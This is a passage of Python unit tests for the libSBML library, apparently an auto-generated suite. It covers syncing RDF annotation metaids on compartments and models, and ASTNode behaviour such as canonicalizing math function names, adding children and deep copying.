xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000003\">\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + "</annotation>") c.setAnnotation(addedAnn) expected = wrapString("<compartment metaid=\"_000005\" id=\"A\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000005\">\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def test_SyncAnnotation_stringChangesMetaid_3(self): c = libsbml.Model(3,1) c.setMetaId("_000005") c.setId("A") addedAnn = wrapString("<annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000003\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + "</annotation>") c.setAnnotation(addedAnn) expected = wrapString("<model metaid=\"_000005\" id=\"A\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000005\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11Z</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02Z</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</model>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def test_SyncAnnotation_stringHistoryWhenNotValid(self): c = libsbml.Compartment(2,3) c.setMetaId("_000003") c.setId("A") addedAnn = wrapString("<annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000005\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + "</annotation>") c.setAnnotation(addedAnn) expected = wrapString("<compartment metaid=\"_000003\" id=\"A\">\n" + " <annotation>\n" + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:dcterms=\"http://purl.org/dc/terms/\" xmlns:vCard=\"http://www.w3.org/2001/vcard-rdf/3.0#\" xmlns:bqbiol=\"http://biomodels.net/biology-qualifiers/\" xmlns:bqmodel=\"http://biomodels.net/model-qualifiers/\">\n" + " <rdf:Description rdf:about=\"#_000003\">\n" + " <bqbiol:is>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:resource=\"http://www.geneontology.org/#GO:0007274\"/>\n" + " </rdf:Bag>\n" + " </bqbiol:is>\n" + " </rdf:Description>\n" + " <rdf:Description rdf:about=\"#_000005\">\n" + " <dc:creator>\n" + " <rdf:Bag>\n" + " <rdf:li rdf:parseType=\"Resource\">\n" + " <vCard:N rdf:parseType=\"Resource\">\n" + " <vCard:Family>Le Novere</vCard:Family>\n" + " <vCard:Given>Nicolas</vCard:Given>\n" + " </vCard:N>\n" + " <vCard:EMAIL><EMAIL></vCard:EMAIL>\n" + " <vCard:ORG rdf:parseType=\"Resource\">\n" + " <vCard:Orgname>EMBL-EBI</vCard:Orgname>\n" + " </vCard:ORG>\n" + " </rdf:li>\n" + " </rdf:Bag>\n" + " </dc:creator>\n" + " <dcterms:created rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2005-02-02T14:56:11</dcterms:W3CDTF>\n" + " </dcterms:created>\n" + " <dcterms:modified rdf:parseType=\"Resource\">\n" + " <dcterms:W3CDTF>2006-05-30T10:46:02</dcterms:W3CDTF>\n" + " </dcterms:modified>\n" + " </rdf:Description>\n" + " </rdf:RDF>\n" + " </annotation>\n" + "</compartment>") self.assertEqual( True, self.equals(expected,c.toSBML()) ) pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestSyncAnnotation)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/math/TestASTNode.py ```python import sys import unittest import libsbml DBL_EPSILON = 2.2204460492503131e-16 class TestASTNode(unittest.TestCase): def test_ASTNode_addChild1(self): node = libsbml.ASTNode() c1 = libsbml.ASTNode() c2 = libsbml.ASTNode() c1_1 = libsbml.ASTNode() i = 0 node.setType(libsbml.AST_LOGICAL_AND) c1.setName( "a") c2.setName( "b") node.addChild(c1) node.addChild(c2) self.assert_( node.getNumChildren() == 2 ) self.assert_(( "and(a, b)" == libsbml.formulaToString(node) )) c1_1.setName( "d") i = node.addChild(c1_1) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( node.getNumChildren() == 3 ) self.assert_(( "and(a, b, d)" == libsbml.formulaToString(node) )) self.assert_(( "a" == node.getChild(0).getName() )) self.assert_(( "b" == node.getChild(1).getName() )) self.assert_(( "d" == node.getChild(2).getName() )) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_addSemanticsAnnotation(self): ann = libsbml.XMLNode() node = libsbml.ASTNode() i = 0 i = node.addSemanticsAnnotation(ann) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( node.getNumSemanticsAnnotations() == 1 ) i = node.addSemanticsAnnotation(None) self.assert_( i == libsbml.LIBSBML_OPERATION_FAILED ) self.assert_( node.getNumSemanticsAnnotations() == 1 ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_avogadro(self): n = libsbml.ASTNode() n.setType(libsbml.AST_NAME_AVOGADRO) n.setName( "NA") self.assert_(( "NA" == n.getName() )) val = n.getReal() self.assert_( val == 6.02214179e23 ) self.assert_( n.isConstant() == 1 ) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_avogadro_bug(self): n = libsbml.ASTNode() n.setName( "NA") n.setType(libsbml.AST_NAME_AVOGADRO) self.assert_(( "NA" == n.getName() )) val = n.getReal() self.assert_( val == 6.02214179e23 ) self.assert_( n.isConstant() == 1 ) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_canonicalizeConstants(self): n = libsbml.ASTNode() n.setName( "ExponentialE") self.assertEqual( True, n.isName() ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_CONSTANT_E ) n.setType(libsbml.AST_NAME) n.setName( "False") self.assertEqual( True, n.isName() ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_CONSTANT_FALSE ) n.setType(libsbml.AST_NAME) n.setName( "Pi") self.assertEqual( True, n.isName() ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_CONSTANT_PI ) n.setType(libsbml.AST_NAME) n.setName( "True") self.assertEqual( True, n.isName() ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_CONSTANT_TRUE ) n.setType(libsbml.AST_NAME) n.setName( "Foo") self.assertEqual( True, n.isName() ) n.canonicalize() self.assertEqual( True, n.isName() ) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_canonicalizeFunctions(self): n = libsbml.ASTNode(libsbml.AST_FUNCTION) n.setName( "abs") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ABS ) n.setType(libsbml.AST_FUNCTION) n.setName( "arccos") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOS ) n.setType(libsbml.AST_FUNCTION) n.setName( "arccosh") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOSH ) n.setType(libsbml.AST_FUNCTION) n.setName( "arccot") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOT ) n.setType(libsbml.AST_FUNCTION) n.setName( "arccoth") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOTH ) n.setType(libsbml.AST_FUNCTION) n.setName( "arccsc") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCSC ) n.setType(libsbml.AST_FUNCTION) n.setName( "arccsch") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCSCH ) n.setType(libsbml.AST_FUNCTION) n.setName( "arcsec") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSEC ) n.setType(libsbml.AST_FUNCTION) n.setName( "arcsech") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSECH ) n.setType(libsbml.AST_FUNCTION) n.setName( "arcsin") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSIN ) n.setType(libsbml.AST_FUNCTION) n.setName( "arcsinh") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSINH ) n.setType(libsbml.AST_FUNCTION) n.setName( "arctan") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCTAN ) n.setType(libsbml.AST_FUNCTION) n.setName( "arctanh") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCTANH ) n.setType(libsbml.AST_FUNCTION) n.setName( "ceiling") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_CEILING ) n.setType(libsbml.AST_FUNCTION) n.setName( "cos") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_COS ) n.setType(libsbml.AST_FUNCTION) n.setName( "cosh") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_COSH ) n.setType(libsbml.AST_FUNCTION) n.setName( "cot") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_COT ) n.setType(libsbml.AST_FUNCTION) n.setName( "coth") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_COTH ) n.setType(libsbml.AST_FUNCTION) n.setName( "csc") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_CSC ) n.setType(libsbml.AST_FUNCTION) n.setName( "csch") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_CSCH ) n.setType(libsbml.AST_FUNCTION) n.setName( "exp") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_EXP ) n.setType(libsbml.AST_FUNCTION) n.setName( "factorial") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_FACTORIAL ) n.setType(libsbml.AST_FUNCTION) n.setName( "floor") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_FLOOR ) n.setType(libsbml.AST_FUNCTION) n.setName( "lambda") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_LAMBDA ) n.setType(libsbml.AST_FUNCTION) n.setName( "ln") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_LN ) n.setType(libsbml.AST_FUNCTION) n.setName( "log") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_LOG ) n.setType(libsbml.AST_FUNCTION) n.setName( "piecewise") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_PIECEWISE ) n.setType(libsbml.AST_FUNCTION) n.setName( "power") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_POWER ) n.setType(libsbml.AST_FUNCTION) n.setName( "root") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ROOT ) n.setType(libsbml.AST_FUNCTION) n.setName( "sec") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_SEC ) n.setType(libsbml.AST_FUNCTION) n.setName( "sech") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_SECH ) n.setType(libsbml.AST_FUNCTION) n.setName( "sin") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_SIN ) n.setType(libsbml.AST_FUNCTION) n.setName( "sinh") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_SINH ) n.setType(libsbml.AST_FUNCTION) n.setName( "tan") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_TAN ) n.setType(libsbml.AST_FUNCTION) n.setName( "tanh") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_TANH ) n.setType(libsbml.AST_FUNCTION) n.setName( "Foo") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION ) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_canonicalizeFunctionsL1(self): n = libsbml.ASTNode(libsbml.AST_FUNCTION) n.setName( "acos") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCCOS ) n.setType(libsbml.AST_FUNCTION) n.setName( "asin") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCSIN ) n.setType(libsbml.AST_FUNCTION) n.setName( "atan") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ARCTAN ) n.setType(libsbml.AST_FUNCTION) n.setName( "ceil") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_CEILING ) n.setType(libsbml.AST_FUNCTION) n.setName( "pow") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_POWER ) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList n = libsbml.ASTNode(libsbml.AST_FUNCTION) n.setName( "log") c = libsbml.ASTNode() c.setName( "x") n.addChild(c) self.assert_( n.getType() == libsbml.AST_FUNCTION ) self.assert_( n.getNumChildren() == 1 ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_LN ) self.assert_( n.getNumChildren() == 1 ) n.setType(libsbml.AST_FUNCTION) c = libsbml.ASTNode() c.setName( "y") n.addChild(c) self.assert_( n.getType() == libsbml.AST_FUNCTION ) self.assert_( n.getNumChildren() == 2 ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_LOG ) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList n = libsbml.ASTNode(libsbml.AST_FUNCTION) n.setName( "log10") c = libsbml.ASTNode() c.setName( "x") n.addChild(c) self.assert_( n.getType() == libsbml.AST_FUNCTION ) self.assert_( n.getNumChildren() == 1 ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_LOG ) self.assert_( n.getNumChildren() == 2 ) c = n.getLeftChild() self.assert_( c.getType() == libsbml.AST_INTEGER ) self.assert_( c.getInteger() == 10 ) c = n.getRightChild() self.assert_( c.getType() == libsbml.AST_NAME ) self.assert_(( "x" == c.getName() )) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList n = libsbml.ASTNode(libsbml.AST_FUNCTION) n.setName( "sqr") c = libsbml.ASTNode() c.setName( "x") n.addChild(c) self.assert_( n.getType() == libsbml.AST_FUNCTION ) self.assert_( n.getNumChildren() == 1 ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_POWER ) self.assert_( n.getNumChildren() == 2 ) c = n.getLeftChild() self.assert_( c.getType() == libsbml.AST_NAME ) self.assert_(( "x" == c.getName() )) c = n.getRightChild() self.assert_( c.getType() == libsbml.AST_INTEGER ) self.assert_( c.getInteger() == 2 ) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList n = libsbml.ASTNode(libsbml.AST_FUNCTION) n.setName( "sqrt") c = libsbml.ASTNode() c.setName( "x") n.addChild(c) self.assert_( n.getType() == libsbml.AST_FUNCTION ) self.assert_( n.getNumChildren() == 1 ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_FUNCTION_ROOT ) self.assert_( n.getNumChildren() == 2 ) c = n.getLeftChild() self.assert_( c.getType() == libsbml.AST_INTEGER ) self.assert_( c.getInteger() == 2 ) c = n.getRightChild() self.assert_( c.getType() == libsbml.AST_NAME ) self.assert_(( "x" == c.getName() )) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_canonicalizeLogical(self): n = libsbml.ASTNode(libsbml.AST_FUNCTION) n.setName( "and") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_LOGICAL_AND ) n.setType(libsbml.AST_FUNCTION) n.setName( "not") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_LOGICAL_NOT ) n.setType(libsbml.AST_FUNCTION) n.setName( "or") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_LOGICAL_OR ) n.setType(libsbml.AST_FUNCTION) n.setName( "xor") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_LOGICAL_XOR ) n.setType(libsbml.AST_FUNCTION) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_canonicalizeRelational(self): n = libsbml.ASTNode(libsbml.AST_FUNCTION) n.setName( "eq") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_RELATIONAL_EQ ) n.setType(libsbml.AST_FUNCTION) n.setName( "geq") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_RELATIONAL_GEQ ) n.setType(libsbml.AST_FUNCTION) n.setName( "gt") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_RELATIONAL_GT ) n.setType(libsbml.AST_FUNCTION) n.setName( "leq") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_RELATIONAL_LEQ ) n.setType(libsbml.AST_FUNCTION) n.setName( "lt") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_RELATIONAL_LT ) n.setType(libsbml.AST_FUNCTION) n.setName( "neq") self.assert_( n.getType() == libsbml.AST_FUNCTION ) n.canonicalize() self.assert_( n.getType() == libsbml.AST_RELATIONAL_NEQ ) n.setType(libsbml.AST_FUNCTION) _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_children(self): parent = libsbml.ASTNode() left = libsbml.ASTNode() right = libsbml.ASTNode() right2 = libsbml.ASTNode() parent.setType(libsbml.AST_PLUS) left.setValue(1) right.setValue(2) right2.setValue(3) parent.addChild(left) parent.addChild(right) self.assert_( parent.getNumChildren() == 2 ) self.assert_( left.getNumChildren() == 0 ) self.assert_( right.getNumChildren() == 0 ) self.assert_( parent.getLeftChild() == left ) self.assert_( parent.getRightChild() == right ) self.assert_( parent.getChild(0) == left ) self.assert_( parent.getChild(1) == right ) self.assert_( parent.getChild(2) == None ) parent.addChild(right2) self.assert_( parent.getNumChildren() == 3 ) self.assert_( left.getNumChildren() == 0 ) self.assert_( right.getNumChildren() == 0 ) self.assert_( right2.getNumChildren() == 0 ) self.assert_( parent.getLeftChild() == left ) self.assert_( parent.getRightChild() == right2 ) self.assert_( parent.getChild(0) == left ) self.assert_( parent.getChild(1) == right ) self.assert_( parent.getChild(2) == right2 ) self.assert_( parent.getChild(3) == None ) _dummyList = [ parent ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_create(self): n = libsbml.ASTNode() ea = libsbml.EventAssignment(2,4) self.assert_( n.getType() == libsbml.AST_UNKNOWN ) self.assert_( n.getCharacter() == "\0" ) self.assert_( n.getName() == None ) self.assert_( n.getInteger() == 0 ) self.assert_( n.getExponent() == 0 ) self.assert_( n.getNumChildren() == 0 ) self.assert_( n.getParentSBMLObject() == None ) _dummyList = [ ea ]; _dummyList[:] = []; del _dummyList _dummyList = [ n ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_deepCopy_1(self): node = libsbml.ASTNode() node.setCharacter( '+') node.addChild(libsbml.ASTNode()) node.addChild(libsbml.ASTNode()) node.getLeftChild().setValue(1) node.getRightChild().setValue(2) self.assert_( node.getType() == libsbml.AST_PLUS ) self.assert_( node.getCharacter() == '+' ) self.assert_( node.getNumChildren() == 2 ) child = node.getLeftChild() self.assert_( child.getType() == libsbml.AST_INTEGER ) self.assert_( child.getInteger() == 1 ) self.assert_( child.getNumChildren() == 0 ) child = node.getRightChild() self.assert_( child.getType() == libsbml.AST_INTEGER ) self.assert_( child.getInteger() == 2 ) self.assert_( child.getNumChildren() == 0 ) copy = node.deepCopy() self.assert_( copy != node ) self.assert_( copy.getType() == libsbml.AST_PLUS ) self.assert_( copy.getCharacter() == '+' ) self.assert_( copy.getNumChildren() == 2 ) child = copy.getLeftChild() self.assert_( child != node.getLeftChild() ) self.assert_( child.getType() == libsbml.AST_INTEGER ) self.assert_( child.getInteger() == 1 ) self.assert_( child.getNumChildren() == 0 ) child = copy.getRightChild() self.assert_( child != node.getRightChild() ) self.assert_( child.getType() == libsbml.AST_INTEGER ) self.assert_( child.getInteger() == 2 ) self.assert_( child.getNumChildren() == 0 ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList _dummyList = [ copy ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_deepCopy_2(self): node = libsbml.ASTNode() node.setName( "Foo") self.assert_( node.getType() == libsbml.AST_NAME ) self.assert_(( "Foo" == node.getName() )) self.assert_( node.getNumChildren() == 0 ) copy = node.deepCopy() self.assert_( copy != node ) self.assert_( copy.getType() == libsbml.AST_NAME ) self.assert_(( "Foo" == copy.getName() )) self.assert_( copy.getNumChildren() == 0 ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList _dummyList = [ copy ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_deepCopy_3(self): node = libsbml.ASTNode(libsbml.AST_FUNCTION) node.setName( "Foo") self.assert_( node.getType() == libsbml.AST_FUNCTION ) self.assert_(( "Foo" == node.getName() )) self.assert_( node.getNumChildren() == 0 ) copy = node.deepCopy() self.assert_( copy != node ) self.assert_( copy.getType() == libsbml.AST_FUNCTION ) self.assert_(( "Foo" == copy.getName() )) self.assert_( copy.getNumChildren() == 0 ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList _dummyList = [ copy ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_deepCopy_4(self): node = libsbml.ASTNode(libsbml.AST_FUNCTION_ABS) node.setName( "ABS") self.assert_( node.getType() == libsbml.AST_FUNCTION_ABS ) self.assert_(( "ABS" == node.getName() )) self.assert_( node.getNumChildren() == 0 ) copy = node.deepCopy() self.assert_( copy != node ) self.assert_( copy.getType() == libsbml.AST_FUNCTION_ABS ) self.assert_(( "ABS" == copy.getName() )) self.assert_( copy.getNumChildren() == 0 ) _dummyList = [ node ]; _dummyList[:] = []; del _dummyList _dummyList = [ copy ]; _dummyList[:] = []; del _dummyList pass def test_ASTNode_freeName(self): node = libsbml.ASTNode() i = 0 i = node.setName( "a") self.assert_( i == 